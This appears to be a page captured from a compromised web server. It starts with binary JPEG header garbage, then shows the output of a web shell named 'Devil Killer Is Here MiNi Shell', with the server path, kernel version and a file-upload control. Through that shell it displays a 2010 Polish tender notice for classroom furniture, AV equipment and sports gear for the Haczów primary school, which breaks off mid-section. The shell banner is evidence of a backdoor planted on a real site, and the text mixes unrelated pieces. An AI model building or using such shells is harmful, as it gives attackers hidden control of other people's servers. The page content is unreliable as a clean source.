JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101126/339297-N-2010.html

<p class="kh_header"><b>Haczów: Dostawa sprzętu, wyposażenia sal dydaktycznych dla Szkoły Podstawowej w Haczowie.</b><br>
<b>Numer ogłoszenia: 339297 - 2010; data zamieszczenia: 26.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Haczów , Haczów 573, 36-213 Haczów, woj. podkarpackie, tel. 013 4391002, faks 013 4391696.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.haczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu, wyposażenia sal dydaktycznych dla Szkoły Podstawowej w Haczowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu, wyposażenia sal dydaktycznych dla Szkoły Podstawowej w Haczowie UWAGA : 1) Sprzęt objęty niniejszym zamówieniem ma posiadać wymagane przepisami higieniczno-sanitarnymi oraz BHP stosowne certyfikaty, deklaracje zgodności itp. , które kwalifikują go jako wyposażenie w jednostkach szkolnych. 2) Meble szkolne, mają być dostarczone do Szkoły Podstawowej w Haczowie i złożone na miejscu. Ewentualny koszt montażu winien być wliczony w cenę mebli. 3)Miejsce pochodzenia przedmiotu zamówienia ( wytworzenia) teren całej Polski oraz państw UE Wyposażenie objęte wyzej wymienionym zamówieniem obejmować będzie niżej wymienione następujące przedmioty w ilości, rozmiarze, kolorze: I. Sala do pozalekcyjnych zajęć artystycznych (plastycznych) 1. stoły- blat 80x80x2,5cm z płyty laminowanej, obrzeże PCV, nogi chromowe - 8 sztuk 2 Krzesła-wykonane z rury chromowej , średnica 22mm, tapicerowane - 32 sztuki 3. Szafki+ regały: Zestaw mebli wykonany z płyty laminowanej w tonacji brzozy, składający się z szafek różnego typu: szafek do ekspozycji zabawek z drzwiczkami do przechowywania pomocy, ławeczki ze skrzynią. Wyposażone w kolorowe aplikacje w kształcie kwiatów i owadów. Zestaw uzupełniony szafą. Dł. zestawu wynosi 420 cm. Wysokość najwyższego elementu 227cm. - 1 zestaw Szafka uśmiechnięta gruszka-wykonanie z płyty laminowanej, kształt gruszka, półki + pojemniki na kółkach i kieszonki wykonane z tkaniny. - 1 szt. Szafka grzybek- wykonanie z płyty laminowanej, kształt grzybek, 10 półek, wymiary 90x46x149cm - 1 szt. Dekoracja Łąka- dekoracja ścienna w żywych i intensywnych kolorach. Elementy dekoracji przymocowane są na stałe. Materiał: welur, filc, wypełniona gąbką w celu usztywnienia. Mocowany do ściany za pomocą szlufek. Wymiary 175x70cm - 1 szt. 4.Tablice korkowe - 3 szt. o wymiarach 120x250cm z ramą drewnianą i 2 szt. o wymiarach 100x180cm z ramą drewnianą : 5 szt. (3 szt. o wymiarach 120x250cm, 2 szt. o wymiarach 100x180cm 5. Rolety- wysokość 245cm, szerokość 128cm x4szt. oraz wys.230cm, szer. 185cm x 2 szt., nieprzepuszczające światła: 6 szt. II. Sala do pozalekcyjnych zajęć artystycznych( technicznych, muzycznych) 1.Telewizor- 42- calowy panel plazmowy HD o rozdzielczości 1024x 768 pikseli, kontrast 3 000 000: 1, technologia 600hz Subfield Driving, system Sual XD Englne, dźwięk Infintte Surround, funkcja Clear Volce II, złącze USBx HDMI, wymiary 107,7x73,6x33 : 1 szt. 2. DVD- posiadające wyjście cyfroweHDMI, złącze USB 2.0( zdjęcia, muzyka, filmy prosto z pamięci USB), wysokiej jakości analogowe i cyfrowe wyjścia audio i video, odtwarzanie: DVD, DVD+R, RW, DVD-R,RW, (S) VCD, XvD, pliki video, CD, CD-R,RV, MP3, pliki audio. Menu wyświetlane na ekranie, pilot: 1 szt. 3. Sprzęt nagłaśniający- 2 kolumny + 2 mikrofony bezprzewodowe+ wzmacniacz( mikser)+ dysk twardy zewnętrzny 3, 5 cala + 2 statywy+ 2 kable łączące kolumny ze wzmacniaczem. 2 kolumny głośnikowe o mocy 100 wat RMS z głośnikiem niskotonowym 10 cali oraz z głośnikiem wysokotonowym z przetwornikiem piezoceramicznym Obudowa typu BASS- REFLEX, wykończona włókniną głośnikową w kolorze czarnym. Kolumna posiada gniazdo do montażu na statywie. Twardy dysk zewnętrzny 3,5 cala z zasilaczem zewnętrznym, pojemność 500 GB, prędkość obrotowa 7200 obr/min, ciche 16 MB, USB 2.0, transfer wewnętrzny 748 Mbit na s, głośność 3dB Mikser stereo z koncówką mocy i efektem digital delay , 4 kanały wejściowe mono, symetryczne: mikrofonowe i liniowe: 1 szt. ( 2 kolumny+ 2 mikrofony bezprzewodowe + wzmacniacz ( mikser)+2 statywy + 2 kable) 4. Zabawki dydaktyczne: -1.Karbownica do papieru- pozwala uzyskać ciekawą fakturę każdej tekturki, wzory: 1 szt. z trzema wzorami - gwiazdki dł. 11 cm - serduszka dł. 11 cm - paseczki dł. 22,5 cm 2. Nożyczki tworzące różne wzory, 8 wymiennych ostrzy+ uchwyt, dł. 13 cm: 1 szt. 3.zestaw ciastoliny- z akcesoriami w słoiku, zawartość: ciastolina 10 szt. x 70ml, 6 foremek, wyciskarki, wałek, 3 nożyki oraz podkładka.: 1 zestaw 4. Biedronka drewniany zegar, wymiary 37x 23x5cm: 1 szt. 5. Dekoracje ścienne- Postacie z bajek, wykonane z miękkiej, bezpiecznej i nietoksycznej pianki. Mocowane z pomocą taśmy samoprzylepnej: 6 szt. po 1 szt. dekoracji - Kubuś na trawce- wym.: 25x14cm -Prosiaczek- wym. 25x13cm - Wesoły Kubuś i Prosiaczek- wym. 21x18cm -Tygrysek siedzący- wym. 27x17 cm - Kłapouchy wym. 20x20cm - Kubuś i 3 przyjaciół wym. 41x36cm 6. Gra Mistrz logiki - zawartość: drewniana skrzynka łączona na wypust o wymiarach 39x 16x 3,5 cm, plansza z drewna bukowego o wym. 38x 15x1,6cm, 80 szt. dwukolorowych żetonów oraz czarne i białe kołki o średnicy 6 mm, drewniana listwa z otworami do układania kodu: 1 szt. 7. Gra Latające pszczółki - gra zręcznościowa, wym. 22x22cm, wykonana z drewna: 1 szt. 8. Flipper- gra zręcznościowa, wym. 25x 42cm, boisko wykonane z drewna: 1 szt. 9. Drewniana mozaika palikowa, wykonana z drewna, w zestaw wchodzi 48 brył 3,5cm w czterech kolorach ( czerwony, zielony, żółty, niebieski) w czterech kształtach ( kula, kwadrat, walec, trójkąt).: 1 szt. 10. Gra Twister- na płótnie : 1 szt. 11. Dziurkacze alfabet - 26 dziurkaczy umieszczonych w praktycznym pudełku. Wymiary opakowania: 46,5 x31x31,5cm. Duże litery wys. 0,8cm: 1 szt. 12. Tamburyn- Kwiat-wymiary: 25x23x4cm, 16 par talerzyków: 2 szt 13. Marakasy drewniane- wykonane z drewna, wymiary 20,5x6x6cm : 2 komplety po 2 szt. 14. Klocki z wielkimi literami- zestaw klocków z alfabetem, wykonane z tworzywa sztucznego 135 elementów.: 1 zestaw 15. Potyczki kota Pysia z literkami- zestaw kart pracy do klocków z literami: każda karta posiada opis danego ćwiczenia. Forma A4, 18 zadań, 16. Farby- Kolor efekt- 8 pojemników po 500ml, od 3 lat: 1 szt. 17. Wałki dekoracyjne, wym. 15 cm: 3 wałki po 5 szt. w każdym - motyw morze -motyw Wielkanoc - motyw wieś 18. Szablony, wym. 15x15cm: 3 szablony po 6 wzorów w każdym - motyw kwiaty - motyw ogród - motyw zagroda 19. Stemple, wym. 5x4cm, wykonane z drewna:2 motywy po 12 szt. w każdym - motyw ogród - motyw owoce 20. Stemple, wykonane z drewna, wym. 6,5 x 7 cm : 6 szt. -motyw Boże Narodzenie 21. Przybory do masy solnej- w zestawie instrukcja z propozycji form z masy solnej, 16 foremek, 4 radełka, 4 łopatki trójkątne, 4 łopatki grzebyczki, 4 łopatki prostokątne, 4 plastikowe nożyki. - 1 zestaw 22. Plastelina- miękka, nie kruszy się, 12 kolorów po 18 pałeczek: 1 zestaw 23. Dziurkacze, wykonane z tworzywa sztucznego: po 1 szt. każdy motyw - motyw motyl -motyw choinka -motyw sasanka -motyw kurczak 24. Aplikacja na ścianę Tęcza, wykonana z tektury, wym. 46,5x 61cm: 1 szt. 25. Aplikacja na ścianę Kwiaty- wykonane: tektura, 1 zestaw, wymiary: - słońce 33x33cm -kwiaty 15 szt. - biedronki - 8 szt. -6 szt. pszczół -4 szt. motylków 26. Wieszak- Alinka z pieskiem złożony z dwóch elementów połączonych sznurkiem. Dostarczony z 4 klamerkami do bielizny, wym. Dziewczynki 32x33 cm, wym. pieska 24x20 cm: 1 szt. 27. Koszyki na drobiazgi z plastiku, różne kolory, wym. 24x15x7cm- 3 szt. oraz wym. 32x20x9,5cm - 3 szt. ( razem 6 szt.tj 3 szt. po 2 rodzaje pudełek 28. Szafka plastyczna na kółkach wykonana z drewna do przechowywania materiałów plastycznych, wym. 80x75x40cm: 1 szt. Szafki + regały 1.Szafka o wym.: wys. 210, szer. 120cm, gł.50cm.Składać się będzie z 2 części. Górna część zamykana dwudrzwiowo, wewnątrz 2 półki, górna o wys. 80cm dolna o wys. 30cm., łatwy dostęp do podłączenia kabli z tyłu sprzętu- miejsce na przedłużacz. Dolna cześć bez podziału zamykana dwudrzwiowo. Szafka zamykana na klucz patentowy. Kolor buk, wykona z płyty laminowanej grubość 18mm: 1 szt. 2.Szafka ze schowkami wykonana z płyty laminowanej grubość 18mm w kolorze buk o wym.: szer.110cm, wys. 200cm, gł.40cm. Na dole 6 schowków o wys.38 cm z 2 półkami, zamykane na kluczyk patentowy. Nad schowkami znajduje się 20 przegródek pionowych o wys. 38 cm, na górze szafka z dwiema pólkami po 38cm wys. każda zamykana na kluczyk patentowy. 1 szt. III. Sala do nauczania indywidualnego 1.Biurko ze stanowiskiem komputerowym- w kształcie litery L, prawostronne, wykonane z płyty laminowanej grubości 25mm (kolor calvados) z dostawką zaokrągloną na płycie+ kontener z szufladami Wymiary 160x120cm ( z dostawką), szerokość blatu 60cm, wysokość biurka 75cm: 1 szt. 2.Szafa na dokumenty zamykana- dwudrzwiowa, dł. 130cm, szer.45cm, wys.220cm. Drzwi przesuwane na rolkach zamykane na klucz patentowy. Szafa podzielona na 2 części po 5 półek. Wysokość półek 40cm, głębokość półek 35cm. Szafa wykonana z płyty laminowanej grubość 18mm, kolor calvados.- 1 szt. 3.Krzesło obrotowe- z regulacją wysokości, tapicerowane z podłokietnikami na kółkach ( kolor tapicerki rudy) - 1 szt. 4. Laptop, drukarka, projektor, ekran- Laptop: wyświetlacz HD 15, 6 cali 1366x768 (WXGA). Procesor Intel Core 13 37)M ( 2, 4 GHz , L3 cache 3 MB). Pamięć RAM DDR3 3G. Dysk twardy 250 GB, Karta graficzna Intel Graphics Madia Accelerator HD. Napęd optyczny DVD Super Multi ( Double Layer) Czytnik kart pamięci. Karta bezprzewodowa WiFi 802,11 b,g, h, USB 2.0. Oryginalny system Windows 7 Home Premium + pakiet biurowy Microsoft Office 2010 r. : 1 szt. Drukarka: pozwalająca drukować (rozdzielczość do 4800 dpi, prędkość wydruku mono,kolor 28,22 str na min), skanować ( rozdzielczość 1200x2400) i kopiować używając intuicyjnego interfejsu, zachowując dobrą jakość dokumentów przetwarzanych, posiadająca przycisk szybkiego anulowania drukowania, wskaźnik poziomu tuszu, możliwość użycia kaset z tuszem o podwyższonej wydajności, obsługującą łączność bezprzewodową Wi-Fi o standardzie 802.11g. : 1 szt. Projektor multimedialny posiadający zoom optyczny, przednią nóżką pozwalającą na regulację wysokości, torbę do transportu, technologię Plug and Play: 1 szt. Ekran- wym. 175x175, format obrazu 1:1, mobilny, składany trójnóg- łatwy do przechowywania w pionie, ergonomiczny uchwyt do przenoszenia i regulacji wysokości, ramię do ustawienia ekranu pod odpowiednim kątem eliminuje efekt trapezu: 1 szt. 5. Krzesła- wykonane z rury chromowej srednica 22 mm, tapicerowane: 4 szt. IV.Sala do prowadzenia zajęć wyrównawczych i rewalidacyjnych 1. Biurko- lewo i prawostronne w kształcie litery L, wykonane z płyty laminowanej grubość 25mm, (kolor calvados). Kolor konstrukcji chrom. Wymiary części lewostronnej: szer. 70cm, dł. 140cm, wys. 75cm z wcięciem na półokrągło przy kontenerze na 3 szuflady szer. 40cm, dł. 40cm, wys. 75cm. Prawostronna część stanowi odbicie lustrzane części lewostronnej: 1 szt. ( składające się z lewej i prawej strony) 2. Meblościanka- 1 szafa o wym.: wys. 200cm, szer. 80cm, gł. 40cm, wykona z płyty laminowanej- grubość 18mm. w kolorze calvados. Lewa połowa szafa zamykana z 5 półkami o wys.38cm. Prawa strona na spodzie z 4 szufladami po 20 cm wysokości i dwiema półkami po 38 cm. 1 szt. 3. Szafka o wym. wys. 200cm, szer. 80cm, gł. 40cm, wykona z płyty laminowanej- grubość 18mm w kolorze calvados na dole 2 półki o wysokości 38cm zamykana jest dwudrzwiowo. Wyżej znajdują się 3 półki po 38 cm wysokości każda : 1 szt. 4. Regał wys. 160, szer.40cm, gł.40cm. składa się z 4 pólek o wysokości 38 cm każda, dolna zamykana drzwiami prawostronnymi. Wykonany z płyty laminowanej, grubość 18mm, kolor calvados: 1 szt. 5. Narożnik półokrągły o wym.: wys. 120cm, szer.40cm,gł.40cm składa się z 4 pólek o wysokości 38 cm każda. Wykonany z płyty laminowanej, grubość 18mm, kolor calvados: 2 szt. 6. Tablica interaktywna- przekątna tablicy: 78 cali, powierzchnia matowa, odporna na uszkodzenia, obsługa palcem, wskaźnikiem teleskopowym, pisakami. Gwarancja 5 lat na powierzchnię, 3 lata na elektronikę, oprogramowanie w języku polskim dla Windows 98 NT 200 XP VISTA oraz Mac OS X na CD, kabel do USB i RS-232, mobilny stojak, inteligentna półka na markery: 1 szt. 7. Krzesło obrotowe- z regulacją wysokości, tapicerowane z podłokietnikami na kółkach ( kolor tapicerki rudy) 1 szt. 8. Stolik- blat 80x80x2,5cm z płyty laminowanej, obrzeże PCV, nogi chromowe: 1 szt. 9. Krzesła- wykonane z rury chromowej O 22, tapicerowane: 4 szt. V. Mała sala gimnastyczna 1. Materac gimnastyczna- materac w obszernym PCV, dół materaca antypoślizgowy. Wypełnienie: pianka wysokoelastyczna. Posiada wzmocnione narożniki, odpowietrzenie oraz uchwyty umożliwiające przenoszenie. Wymiary materace: grubość 10cm, szerokość 120cm, długość 200cm: 10 szt. 2.Materac do skoku wzwyż- materac w obszyciu PCV, dół materaca antypoślizgowy. Wypełnienie pianka wysokoelastyczna. Posiada wzmocnione narożniki, odpowietrzenia oraz uchwyty o przenoszenia. Wymiary materaca: grubość 40cm, szerokość 120cm, długość 200cm: 4 szt 3. Drabinka koordynacyjna- szerokość 42 cm, długość 8 m b, płaskie szczebelki w zestawie ze szpilkami mocującymi do ziemi i przyssawkami do mocowania na posadzce hali: 4 szt. 4. Skrzynia gimnastyczna- skrzynia składa się z 5 części. Części składowe wykonane są z brzozowego drewna multiplet, a elementy narożne z twardego drewna. Narożnikowe elementy połączeń są ze sobą sklejone i skręcone - dzięki temu odporne na uderzenia. Skrzynia obciągnięta bydlęcą skórą. Elementy narożne zaokrąglone. Wymiary skrzyni: długość 150 cm, szerokość 50 cm, wysokość 110 cm.: 1 szt. 5. Kask do unihokeja- wykonany z tworzywa sztucznego odpornego na uderzenia, posiada kratkę ochronną, zapewnia ochronę twarzy:4 szt. 6. Piłki do unihokeja- bezpieczna piłka z otworami, średnica 70 mm, kolor biały : 10 szt, kolor czerwony : 10 szt. 7. Kije do unihokeja- stabilny i stożkowy trzonek składa się z włókna szklanego z rączką i końcówką z polietylenu. Długość trzonku 96cm: 30 szt. 8. Płotki lekkoatletyczne treningowe- płotki samowstające, po przewróceniu płotki same podnoszą się do pozycji pionowej. Stabilna, lekka aluminiowa konstrukcja, ze składanymi stopkami. Regulacja wysokości od 55-84 cm. 7 wysokości: 55 cm-70cm skok o 5cm. 76, 80, 84 cm. Szerokość płotka 83cm, waga nie więcej niż 2,5 kg. Nie posiada ostrych krawędzi, wyposażony w ochraniacze: 10 szt. 9. Piłki do piłki ręcznej nr 1- zewnętrzna powłoka wykonana z tworzywa syntetycznego PU/ AVS. Sześciowarstwowa struktura, lateksowa dętka. Rozmiar nr 1 ( junior 50-52cm). Szyta ręcznie, 32 panelowa: 20 szt. 10. Piłki do piłki ręcznej nr 2 - zewnętrzna powłoka wykonana z tworzywa syntetycznego PU/ AVS 9 upper layer in high guality) AVS. Sześciowarstwowa struktura, lateksowa dętka. Rozmiar nr 2 ( damska 54-56 cm). Szyta ręcznie, 32 panelowa ( piłki w 2 kolorach): 20 szt. 11. Piłki do piłki koszykowej- wykonana z odpornej powłoki syntetycznej. Piłka na boiska zewnętrzna i do hali. 15 szt. rozmiar nr 5. i 5 szt.nr.6. Optymalne zachowanie kształtu i odbicia. Piłka ma posiadać atest FIBA: 20 szt.( 15 szt. o nr 5 i 5 szt. nr 6 12. Zestaw taśm do ćwiczeń - taśmy posiadają zapięcie pozwalające na szybkie i proste mocowanie na słupkach bramek, wokół bioder, ramion, nóg. System mocowania na rzep na obu końcach, brak metalu lub plastiku na taśmie. Taśma odporna na warunki atmosferyczne. 100% rozciągliwości. 2 szt. Taśm o długości 2mb ( rozciągliwość 4 mb), 2 szt. Taśm o długości 4 mb ( rozciągliwość 8 mb). Szerokość taśmy min. 5cm.: 2 szt. taśm o długości 2 mb , rozciągliwość 4 mb, 2 szt. taśm o długości 4 mb o rozciągliwości 8 mb 13. Klaps startowy- klops z dobrym efektem efektem akustycznym o dobrej widoczności, metalowe uchwyty, wykonany z drewna na metalowym zawiasie. Dwa półokrągłe znaczniki do efektu widoczności startu. Posiada zabezpieczenie przed niezamierzonym wydaniem sygnału do startu 1 szt. 14. Pałeczki sztafetowe- wykonane z lekkiego stopu metalu, pałeczki o różnych kolanach. Średnica pałeczki -38 mm, długość 299 mm : 6 szt. 15. Rakietki do tenisa stołowego- rakieta z okładzina dopuszczona przez ITTF. Czopy do wewnątrz. Gąbka o grubości 1,8 mm. Uchwyt rakiety profilowany z drewna klejonego pięciowarstwowego: 20 szt. 16. Taśma do mierzenia- Taśma wykonana ze stali nierdzewnej, szerokość 13mm, podziałka centymetrowa z jednej strony, zwijana za pomocą korby. Obudowa kapsuły z tworzywa sztucznego odpornego na uderzenia. Długość taśmy 30 m : 2 szt. 17. Stroje do piłki ręcznej- spodenki z małym numerem na prawej nodze (12 szt.), koszulki z dużym numerem na plecach z napisem Haczów- 12 szt. ( 1x 164cm, 12x 158cm), kolor żółty lub żółty z czarnymi wstawkami + strój dla bramkarza ( 1x164cm). ( 1 komplet 1 x 164 cm, 11x 158 cm i strój dla bramkarza - 164 cm 18. Osłony na okna-kraty otwierane do wewnątrz, ściągane, wymiary wys.140cm, szer.235cm: 2 szt VI. Sala do dodatkowych zajęć pozalekcyjnych z różnych przedmiotów 1. Stoły- blat 80 x 80 x 2,5cm z płyty laminowanej, obrzeże PCV, nogi chromowe: 6 szt. 2. Krzesła- wykonane z rury chromowej o średnicy 22, tapicerowane: 24 szt. 3. Żaluzje pionowe- szer. 580cm, wys. 180cm, kolor żółty cieniowany; 1 szt. 4. Regały: 1)Regał szer.80 cm, wys.160, gł.40 cm wykonana z płyty laminowanej grubość 18mm w kolorze buk,. Składa się z 4 półek po 38 cm wys., dwie dolne zamykane dwudrzwiowo: 1 szt. 2) Regał szer. 40cm, wys. 120 cm, gł.40 cm, wykona z płyty laminowanej grubość 18 mm w kolorze buk, składa się z 3 półek każda po 38 cm wys.: 1 szt. 3)Regał szer.80cm, wys.160, gł.40cm wykonana z płyty laminowanej grubość 18mm w kolorze buk. W górnej części regału znajdują się 2 półki po 38cm wys. każda. Na dole z lewej strony 4 szuflady, a z prawej strony szafka zamykana prawostronnie 2 pólkami. : 1 szt. 5. Tablica interaktywna- przekątna tablicy: 78 cali, powierzchnia matowa, odporna na uszkodzenia, obsługa palcem, wskaźnikiem teleskopowym, pisakami. Gwarancja 5 lat na powierzchnię, 3 lata na elektronikę, oprogramowanie w języku polskim dla Windows 98 NT 200 XP VISTA oraz Mac OS X na CD, kabel do USB i RS-232, mobilny stojak, inteligentna półka na markery : 1 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 32.00.00.00-3, 32.30.00.00-6, 30.20.00.00-1, 38.00.00.00-5, 39.00.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę, a określonych na podstawie art. 22 ust.1 ustawy Pzp ,oświadczenia o  nie  podleganiu  wykluczeniu z postępowania na podstawie  art. 24 ust. 1 i 2 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli wykaże się:
a) wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 dostawy wyposażenia szkół w pomoce naukowe, wyposażenie sal  dydaktycznych.
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a)wykazu dostaw wyposażenia szkół w zakresie niezbędnym do wykazania spełniania warunku wiedzy  i doświadczenia, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że dostawy  zostały przeprowadzone prawidłowo. W przypadku  przekształceń firmy  niezbędna jest ciągłość prowadzonej działalności</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje potencjałem technicznym do wykonania zamówienia, jeżeli:
a) dysponuje lub  dysponował będzie następującym sprzętem ( wymagania minimalne) :samochód dostawczy : 1 szt.  
	                         
